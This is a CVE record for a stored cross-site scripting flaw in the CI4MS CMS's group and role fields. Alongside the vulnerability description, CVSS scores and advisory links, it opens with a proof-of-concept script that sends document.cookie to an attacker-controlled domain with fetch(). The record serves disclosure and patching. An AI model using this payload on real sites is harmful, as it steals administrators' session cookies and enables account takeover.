CVE-2026-34557

<!-- Stored XSS PoC for CI4MS Group/Role Management --> <!-- Inject this payload into the vulnerable group name or description fields --> <script> // Example: Send current session cookies to an external server controlled by the attacker fetch('https://attacker-controlled-domain.com/steal?cookie=' + encodeURIComponent(document.cookie)) .then(response => console.log('Exfiltrated')) .catch(error => console.error('Error:', error)); </script>

{"cve": {"id": "CVE-2026-34557", "sourceIdentifier": "[email protected]", "published": "2026-03-30T21:17:10.323", "lastModified": "2026-04-06T16:53:19.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within group and role management functionality. Multiple input fields (three distinct group-related fields) can be injected with malicious JavaScript payloads, which are then stored server-side. These stored payloads are later rendered unsafely within privileged administrative views without proper output encoding, leading to stored cross-site scripting (XSS) within the role and permission management context. This issue has been patched in version 0.31.0.0."}, {"lang": "es", "value": "CI4MS es un esqueleto de CMS basado en CodeIgniter 4 que ofrece una arquitectura modular lista para producción con autorización RBAC y soporte de temas. Antes de la versión 0.31.0.0, la aplicación no logra sanitizar correctamente la entrada controlada por el usuario dentro de la funcionalidad de gestión de grupos y roles. Múltiples campos de entrada (tres campos distintos relacionados con grupos) pueden ser inyectados con cargas útiles de JavaScript maliciosas, las cuales son luego almacenadas en el servidor. Estas cargas útiles almacenadas son luego renderizadas de forma insegura dentro de vistas administrativas privilegiadas sin una codificación de salida adecuada, lo que lleva a cross-site scripting (XSS) almacenado dentro del contexto de gestión de roles y permisos. Este problema ha sido parcheado en la versión 0.31.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 5.3}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.31.0.0", "matchCriteriaId": "805F6B8A-9324-4CA4-BADE-439CC15DA14C"}]}]}], "references": [{"url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-rpjr-985c-qhvm", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-rpjr-985c-qhvm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}